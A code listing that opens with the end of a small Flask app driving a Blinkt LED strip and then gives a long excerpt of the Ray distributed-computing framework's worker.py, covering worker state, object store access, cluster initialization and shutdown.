r, g, b = [int(c * 255) for c in colorsys.hsv_to_rgb(h, 1.0, 1.0)]
blinkt.set_pixel(x, r, g, b)
blinkt.show()
time.sleep(0.001)
blinkt.clear()
if __name__ == "__main__":
app.run(port=3000, host="0.0.0.0")
|
worker.py
|
from contextlib import contextmanager
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple, Union
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.gcs_utils as gcs_utils
import ray._private.services as services
from ray._private.runtime_env.py_modules import upload_py_modules_if_needed
from ray._private.runtime_env.working_dir import upload_working_dir_if_needed
from ray._private.runtime_env.constants import RAY_JOB_CONFIG_JSON_ENV_VAR
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
from ray.util.annotations import PublicAPI, DeveloperAPI, Deprecated
from ray.util.debug import log_once
import ray
import colorama
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
import ray._private.profiling as profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import check_oversized_function
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import _internal_kv_get, \
_internal_kv_initialized, _initialize_internal_kv, \
_internal_kv_reset
from ray._private.client_mode_hook import client_mode_hook
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
logger.error("Unhandled error (suppress with "
"RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
self.node = None
self.mode = None
self.cached_functions_to_run = []
self.actors = {}
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
self.memory_monitor = memory_monitor.MemoryMonitor()
# A dictionary that maps from driver id to SerializationContext
# TODO: clean up the SerializationContext once the job finished.
self.serialization_context_map = {}
self.function_actor_manager = FunctionActorManager(self)
# This event is checked regularly by all of the threads so that they
# know when to exit.
self.threads_stopped = threading.Event()
# Index of the current session. This number will
        # increment every time `ray.shutdown` is called.
self._session_index = 0
# If this is set, the next .remote call should drop into the
# debugger, at the specified breakpoint ID.
self.debugger_breakpoint = b""
# If this is set, ray.get calls invoked on the object ID returned
# by the worker should drop into the debugger at the specified
# breakpoint ID.
self.debugger_get_breakpoint = b""
# If True, make the debugger external to the node this worker is
# running on.
self.ray_debugger_external = False
self._load_code_from_local = False
# Used to toggle whether or not logs should be filtered to only those
# produced in the same job.
self.filter_logs_by_job = True
@property
def connected(self):
"""bool: True if Ray has been started and False otherwise."""
return self.node is not None
@property
def node_ip_address(self):
self.check_connected()
return self.node.node_ip_address
@property
def load_code_from_local(self):
self.check_connected()
return self._load_code_from_local
@property
def current_job_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_current_job_id()
return JobID.nil()
@property
def actor_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_actor_id()
return ActorID.nil()
@property
def current_task_id(self):
return self.core_worker.get_current_task_id()
@property
def current_node_id(self):
return self.core_worker.get_current_node_id()
@property
def namespace(self):
return self.core_worker.get_job_config().ray_namespace
@property
def placement_group_id(self):
return self.core_worker.get_placement_group_id()
@property
def worker_id(self):
return self.core_worker.get_worker_id().binary()
@property
def should_capture_child_tasks_in_placement_group(self):
return self.core_worker.should_capture_child_tasks_in_placement_group()
@property
def current_session_and_job(self):
"""Get the current session index and job id as pair."""
assert isinstance(self._session_index, int)
assert isinstance(self.current_job_id, ray.JobID)
return self._session_index, self.current_job_id
@property
def runtime_env(self):
"""Get the runtime env in json format"""
return self.core_worker.get_current_runtime_env()
def get_serialization_context(self, job_id=None):
"""Get the SerializationContext of the job that this worker is processing.
Args:
job_id: The ID of the job that indicates which job to get
the serialization context for.
Returns:
The serialization context of the given job.
"""
# This function needs to be protected by a lock, because it will be
        # called by `register_class_for_serialization`, as well as the import
# thread, from different threads. Also, this function will recursively
# call itself, so we use RLock here.
if job_id is None:
job_id = self.current_job_id
with self.lock:
if job_id not in self.serialization_context_map:
self.serialization_context_map[
job_id] = serialization.SerializationContext(self)
return self.serialization_context_map[job_id]
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
raise RaySystemError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
"""
self.mode = mode
def set_load_code_from_local(self, load_code_from_local):
self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None, owner_address=None):
"""Put value in the local object store with object reference `object_ref`.
This assumes that the value for `object_ref` has not yet been placed in
the local object store. If the plasma store is full, the worker will
automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
retry will delay for an exponentially doubling amount of time,
starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
will be raised.
Args:
value: The value to put in the object store.
object_ref (ObjectRef): The object ref of the value to be
put. If None, one will be generated.
owner_address: The serialized address of object's owner.
Returns:
ObjectRef: The object ref the object was put under.
Raises:
ray.exceptions.ObjectStoreFullError: This is raised if the attempt
to store the object fails because the object store is full even
after multiple retries.
"""
# Make sure that the value is not an object ref.
if isinstance(value, ObjectRef):
raise TypeError(
"Calling 'put' on an ray.ObjectRef is not allowed "
"(similarly, returning an ray.ObjectRef from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ray.ObjectRef in a list and "
"call 'put' on it (or return it).")
if self.mode == LOCAL_MODE:
assert object_ref is None, ("Local Mode does not support "
"inserting with an ObjectRef")
serialized_value = self.get_serialization_context().serialize(value)
# This *must* be the first place that we construct this python
# ObjectRef because an entry with 0 local references is created when
# the object is Put() in the core worker, expecting that this python
# reference will be created. If another reference is created and
# removed before this one, it will corrupt the state in the
# reference counter.
return ray.ObjectRef(
self.core_worker.put_serialized_object(
serialized_value,
object_ref=object_ref,
owner_address=owner_address),
# If the owner address is set, then the initial reference is
# already acquired internally in CoreWorker::CreateOwned.
# TODO(ekl) we should unify the code path more with the others
# to avoid this special case.
skip_adding_local_ref=(owner_address is not None))
def raise_errors(self, data_metadata_pairs, object_refs):
out = self.deserialize_objects(data_metadata_pairs, object_refs)
if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
return
for e in out:
_unhandled_error_handler(e)
def deserialize_objects(self, data_metadata_pairs, object_refs):
# Function actor manager or the import thread may call pickle.loads
# at the same time which can lead to failed imports
# TODO: We may be better off locking on all imports or injecting a lock
# into pickle.loads (https://github.com/ray-project/ray/issues/16304)
with self.function_actor_manager.lock:
context = self.get_serialization_context()
return context.deserialize_objects(data_metadata_pairs,
object_refs)
def get_objects(self, object_refs, timeout=None):
"""Get the values in the object store associated with the IDs.
Return the values from the local object store for object_refs. This
will block until all the values for object_refs have been written to
the local object store.
Args:
object_refs (List[object_ref.ObjectRef]): A list of the object refs
whose values should be retrieved.
            timeout (float): The maximum amount of time in
seconds to wait before returning.
Returns:
list: List of deserialized objects
bytes: UUID of the debugger breakpoint we should drop
into or b"" if there is no breakpoint.
"""
# Make sure that the values are object refs.
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError(
f"Attempting to call `get` on the value {object_ref}, "
"which is not an ray.ObjectRef.")
timeout_ms = int(timeout * 1000) if timeout else -1
data_metadata_pairs = self.core_worker.get_objects(
object_refs, self.current_task_id, timeout_ms)
debugger_breakpoint = b""
for (data, metadata) in data_metadata_pairs:
if metadata:
metadata_fields = metadata.split(b",")
if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
debugger_breakpoint = metadata_fields[1][len(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
return self.deserialize_objects(data_metadata_pairs,
object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
takes only one argument, a worker info dict. If it returns
anything, its return values will not be used.
"""
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.shake_128(pickled_function).digest(
ray_constants.ID_SIZE)
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_function(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.redis_client.hset(
key,
mapping={
"job_id": self.current_job_id.binary(),
"function_id": function_to_run_id,
"function": pickled_function,
})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
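    # Illustrative driver-side export (the path is an example); connect() below
    # uses the same pattern to extend every worker's sys.path:
    #   worker.run_function_on_all_workers(
    #       lambda worker_info: sys.path.insert(1, "/tmp/shared_code"))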
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
def print_logs(self):
"""Prints log messages from workers on all nodes in the same job.
"""
pubsub_client = self.redis_client.pubsub(
ignore_subscribe_messages=True)
pubsub_client.subscribe(gcs_utils.LOG_FILE_CHANNEL)
localhost = services.get_node_ip_address()
try:
# Keep track of the number of consecutive log messages that have
# been received with no break in between. If this number grows
# continually, then the worker is probably not able to process the
# log messages as rapidly as they are coming in.
num_consecutive_messages_received = 0
job_id_binary = ray._private.utils.binary_to_hex(
self.current_job_id.binary())
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = pubsub_client.get_message()
if msg is None:
num_consecutive_messages_received = 0
self.threads_stopped.wait(timeout=0.01)
continue
num_consecutive_messages_received += 1
if (num_consecutive_messages_received % 100 == 0
and num_consecutive_messages_received > 0):
logger.warning(
"The driver may not be able to keep up with the "
"stdout/stderr of the workers. To avoid forwarding "
"logs to the driver, use "
"'ray.init(log_to_driver=False)'.")
data = json.loads(ray._private.utils.decode(msg["data"]))
# Don't show logs from other drivers.
if (self.filter_logs_by_job and data["job"]
and job_id_binary != data["job"]):
continue
data["localhost"] = localhost
global_worker_stdstream_dispatcher.emit(data)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"print_logs: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
pubsub_client.close()
@PublicAPI
@client_mode_hook(auto_init=True)
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
worker = global_worker
worker.check_connected()
if worker.mode != WORKER_MODE:
if log_once("worker_get_gpu_ids_empty_from_driver"):
logger.warning(
"`ray.get_gpu_ids()` will always return the empty list when "
"called from the driver. This is because Ray does not manage "
"GPU allocations to the driver process.")
# TODO(ilr) Handle inserting resources in local mode
all_resource_ids = global_worker.core_worker.resource_ids()
assigned_ids = set()
for resource, assignment in all_resource_ids.items():
# Handle both normal and placement group GPU resources.
# Note: We should only get the GPU ids from the placement
# group resource that does not contain the bundle index!
import re
if resource == "GPU" or re.match(r"^GPU_group_[0-9A-Za-z]+$",
resource):
for resource_id, _ in assignment:
assigned_ids.add(resource_id)
assigned_ids = list(assigned_ids)
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
# Give all GPUs in local_mode.
if global_worker.mode == LOCAL_MODE:
max_gpus = global_worker.node.get_resource_spec().num_gpus
assigned_ids = global_worker.original_gpu_ids[:max_gpus]
return assigned_ids
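# Illustrative usage (the resource request is an example): inside a task declared
# with @ray.remote(num_gpus=1), ray.get_gpu_ids() returns the IDs assigned to that
# task, e.g. [0], mapped through CUDA_VISIBLE_DEVICES if it was set at startup.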
@Deprecated
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
worker = global_worker
worker.check_connected()
if _mode() == LOCAL_MODE:
raise RuntimeError(
"ray.worker.get_resource_ids() currently does not work in "
"local_mode.")
return global_worker.core_worker.resource_ids()
@Deprecated
def get_dashboard_url():
"""Get the URL to access the Ray dashboard.
Note that the URL does not specify which node the dashboard is on.
Returns:
The URL of the dashboard as a string.
"""
worker = global_worker
worker.check_connected()
return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@PublicAPI
@client_mode_hook(auto_init=False)
def init(
address: Optional[str] = None,
*,
num_cpus: Optional[int] = None,
num_gpus: Optional[int] = None,
resources: Optional[Dict[str, float]] = None,
object_store_memory: Optional[int] = None,
local_mode: bool = False,
ignore_reinit_error: bool = False,
include_dashboard: Optional[bool] = None,
dashboard_host: str = ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port: Optional[int] = None,
job_config: "ray.job_config.JobConfig" = None,
configure_logging: bool = True,
logging_level: int = ray_constants.LOGGER_LEVEL,
logging_format: str = ray_constants.LOGGER_FORMAT,
log_to_driver: bool = True,
namespace: Optional[str] = None,
runtime_env: Dict[str, Any] = None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction: bool = False,
_redis_max_memory: Optional[int] = None,
_plasma_directory: Optional[str] = None,
_node_ip_address: str = ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory: Optional[int] = None,
_memory: Optional[int] = None,
_redis_password: str = ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir: Optional[str] = None,
_metrics_export_port: Optional[int] = None,
_system_config: Optional[Dict[str, str]] = None,
_tracing_startup_hook: Optional[Callable] = None,
**kwargs):
"""
Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases; either a Ray cluster already exists and we
just attach this driver to it or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray locally and all of the relevant processes, use this as
follows:
.. code-block:: python
ray.init()
To connect to an existing local cluster, use this as follows (substituting
in the appropriate port if needed).
.. code-block:: python
ray.init(address="localhost:6379")
To connect to an existing remote cluster, use this as follows (substituting
in the appropriate address). Note the addition of "ray://" at the beginning
of the address.
.. code-block:: python
ray.init(address="ray://123.45.67.89:10001")
More details for starting and connecting to a remote cluster can be found
here: https://docs.ray.io/en/master/cluster/ray-client.html
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
tells the driver to detect the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
Addresses can be prefixed with a "ray://" to connect to a remote
cluster. For example, passing in the address
"ray://123.45.67.89:50005" will connect to the cluster at the
given address.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
resources: A dictionary mapping the names of custom resources to the
quantities for them available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
        dashboard_port (int, None): The port to bind the dashboard server to.
Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
namespace (str): Namespace to use
runtime_env (dict): The runtime environment to use for this job (see
:ref:`runtime-environments` for details). This API is in beta
and may change before becoming stable.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Deprecated.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
        _metrics_export_port (int): Port on which Ray exposes system metrics
through a Prometheus endpoint. It is currently under active
development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
If the provided address includes a protocol, for example by prepending
"ray://" to the address to get "ray://1.2.3.4:10001", then a
ClientContext is returned with information such as settings, server
versions for ray and python, and the dashboard_url. Otherwise,
returns address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# If available, use RAY_ADDRESS to override if the address was left
# unspecified, or set to "auto" in the call to init
address_env_var = os.environ.get(
ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE)
if address_env_var:
if address is None or address == "auto":
address = address_env_var
logger.info(
f"Using address {address_env_var} set in the environment "
f"variable {ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE}")
if address is not None and "://" in address:
# Address specified a protocol, use ray client
builder = ray.client(address, _deprecation_warn_enabled=False)
# Forward any keyword arguments that were changed from their default
# values to the builder
init_sig = inspect.signature(init)
passed_kwargs = {}
for argument_name, param_obj in init_sig.parameters.items():
if argument_name in {"kwargs", "address"}:
# kwargs and address are handled separately
continue
default_value = param_obj.default
passed_value = locals()[argument_name]
if passed_value != default_value:
# passed value is different than default, pass to the client
# builder
passed_kwargs[argument_name] = passed_value
passed_kwargs.update(kwargs)
builder._init_args(**passed_kwargs)
return builder.connect()
if kwargs:
        # The user passed extra keyword arguments but isn't connecting through
        # Ray Client. Raise an error, since this is most likely a keyword typo.
unknown = ", ".join(kwargs)
raise RuntimeError(f"Unknown keyword argument(s): {unknown}")
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if RAY_JOB_CONFIG_JSON_ENV_VAR in os.environ:
if runtime_env:
logger.warning(
"Both RAY_JOB_CONFIG_JSON_ENV_VAR and ray.init(runtime_env) "
"are provided, only using JSON_ENV_VAR to construct "
"job_config. Please ensure no runtime_env is used in driver "
"script's ray.init() when using job submission API.")
# Set runtime_env in job_config if passed as env variable, such as
# ray job submission with driver script executed in subprocess
job_config_json = json.loads(
os.environ.get(RAY_JOB_CONFIG_JSON_ENV_VAR))
job_config = ray.job_config.JobConfig.from_json(job_config_json)
# RAY_JOB_CONFIG_JSON_ENV_VAR is only set at ray job manager level and has
# higher priority in case user also provided runtime_env for ray.init()
elif runtime_env:
# Set runtime_env in job_config if passed in as part of ray.init()
if job_config is None:
job_config = ray.job_config.JobConfig()
job_config.set_runtime_env(runtime_env)
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
# We need to disable it if runtime env is not set.
# Uploading happens after core worker is created. And we should
# prevent default worker being created before uploading.
# TODO (yic): Have a separate connection to gcs client when
            # redis removal is done. The uploading should happen before this
# one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
# # Here the flag `load_code_from_local` is still True if we
        # # don't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
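# Illustrative local call (the resource count is an example): ray.init(num_cpus=2)
# starts a cluster on this machine and returns its address_info dict augmented
# with the hex "node_id" of the local node, as constructed above.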
# Functions to run as callback after a successful ray init.
_post_init_hooks = []
@PublicAPI
@client_mode_hook(auto_init=False)
def shutdown(_exiting_interpreter: bool = False):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to cleanup state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
Args:
_exiting_interpreter (bool): True if this is called by the atexit hook
and false otherwise. If we are exiting the interpreter, we will
wait a little while to print any extra error messages.
"""
if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
# This is a duration to sleep before shutting down everything in order
# to make sure that log messages finish printing.
time.sleep(0.5)
disconnect(_exiting_interpreter)
# disconnect internal kv
if hasattr(global_worker, "gcs_client"):
del global_worker.gcs_client
_internal_kv_reset()
# We need to destruct the core worker here because after this function,
# we will tear down any processes spawned by ray.init() and the background
# IO thread in the core worker doesn't currently handle that gracefully.
if hasattr(global_worker, "core_worker"):
global_worker.core_worker.shutdown()
del global_worker.core_worker
# Disconnect global state from GCS.
ray.state.state.disconnect()
# Shut down the Ray processes.
global _global_node
if _global_node is not None:
if _global_node.is_head():
_global_node.destroy_external_storage()
_global_node.kill_all_processes(check_alive=False, allow_graceful=True)
_global_node = None
# TODO(rkn): Instead of manually resetting some of the worker fields, we
# should simply set "global_worker" to equal "None" or something like that.
global_worker.set_mode(None)
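# Illustrative between-tests pattern the docstring above describes:
#   ray.init(num_cpus=1)   # resource count is an example
#   ...                    # test body
#   ray.shutdown()         # safe to call again even if Ray is already stopped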
atexit.register(shutdown, True)
# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
sys.exit(signum)
try:
ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
logger.warning("Failed to set SIGTERM handler, processes might"
"not be cleaned up properly on exit.")
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to GCS worker table.
if global_worker.mode == SCRIPT_MODE and hasattr(global_worker,
"worker_id"):
error_message = "".join(traceback.format_tb(tb))
worker_id = global_worker.worker_id
worker_type = gcs_utils.DRIVER
worker_info = {"exception": error_message}
ray.state.state._check_connected()
ray.state.state.add_worker(worker_id, worker_type, worker_info)
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_to_stdstream(data):
print_file = sys.stderr if data["is_err"] else sys.stdout
print_worker_logs(data, print_file)
# Start time of this process, used for relative time logs.
t0 = time.time()
autoscaler_log_fyi_printed = False
